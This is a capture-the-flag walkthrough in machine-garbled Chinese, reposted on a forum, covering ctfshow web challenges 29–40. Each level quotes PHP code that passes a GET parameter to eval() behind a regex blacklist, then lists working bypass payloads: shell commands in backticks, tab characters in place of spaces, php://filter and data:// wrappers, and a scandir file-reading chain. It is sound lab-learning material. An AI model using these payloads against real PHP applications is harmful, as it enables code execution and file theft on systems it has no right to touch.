ctfshow(web入门-下令实验)-1
1.web29只有当c参数的值不包罗“flag”(区分巨细写),才会实验这段代码
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
只要payload中没有flag即可
先实验cat (右键源代码) tail,tac皆可
system("tail fla*");
tac 逆序读
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvZWQwYjhhN2Y0NTY0NGMxYzllNzc0ZTllNmQxNDliZmIucG5n
tail 默认读后10行
利用文件表现函数
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvODg3OTA0YTc3MWNhNDUxZWE2ZjE3NGE2YmY1OWNhOWIucG5n
cp函数 等等。。
2.web30
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
不能出现 flag,system,php
echo`cat fl*g.p*hp`; 取代 system 右键源代码查察
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvMTg5YmE1NTFhNWZkNGY0NjkyZTBhNGYzYmMxZDg2MDUucG5n highlight_file(base64_decode("ZmxhZy5waHA="));
3.web31
绕过
"flag"、"system"、"php"、"cat"、"sort"、"shell"、点号(".")、空格(" ")和单引号("'")
highlight_file(base64_decode("ZmxhZy5waHA="));
echo`tac%09fl*`; %09取代空格
第二种
利用 eval.让 1逃逸
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvMzQxOGNhYWRmOWFkNDA1NmEzYWVmOTU2NmUzZWMzMmIucG5n
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvZWQxYzEzNGQxNzFkNGIxMWJmYmI4MjAyZGI4N2I1MzQucG5n
4.web32
/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(
比上一题多了 echo ( ; 不能利用下令注入了,实验其他方法。
c=include$_GET?>&1=php://filter/convert.base64-encode/resource=flag.php
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvYjBmZmYyY2RkYTZlNDBlOGEwN2ZlN2ExZWZiMWYzOTYucG5n
5.web33
比上一题多了一个双引号
payload
c=include$_GET?>&1=php://filter/convert.base64-encode/resource=flag.php
c=rerquirexx
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvNWMzMTRkZjk2NDJjNDI5MjlkMTUwNDdhY2RjNzhmYzYucG5n
6.web34
和上一题一样。
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvNjliMWIyMmZlNjVmNDIyN2EzNGY4Y2ZjYjUyYTQwNmMucG5n
7.web35
payload同上
c=include$_GET%0a?>&1=php://filter/convert.base64-encode/resource=flag.php
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvYjc0NDM2M2JiYmU2NGNiNmE4YjE3MDBkMWIxNjViYWEucG5n
8.web36
比上一关多了对数字的限定
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvMDM5YWEyZmFhMjEyNGFkM2JiMDFlYmFjODFmYTVmZTkucG5n
9.web37
有include先实验一下
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvODU1N2FmMjM3MzkxNGNlN2I4MjdjZWUyYmQyZDY0NWMucG5n
然后用data实验代码
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvYjRiMWRkMDUwZDc5NDY0YmJjZmNiMjZlZjI1NWMzYzAucG5n
10.web38
过滤了即是号
可以将 <?php system('ls')> >> <?= system("ls")>
c=data://text/plain/,<?=system('tac fl*.*')?>
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvMzgxOGVlMGYzNjUzNDhjYjllMDE2MGNhNjYzNmMxM2QucG5n 11.web39
payload 同上
c=data://text/plain/,<?=system('tac fl*.*')?>
12.web40
官方解法
show_source(next(array_reverse(scandir(pos(localeconv())))));
小白一枚,如有不敷请多多指教!!!
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金
页:
[1]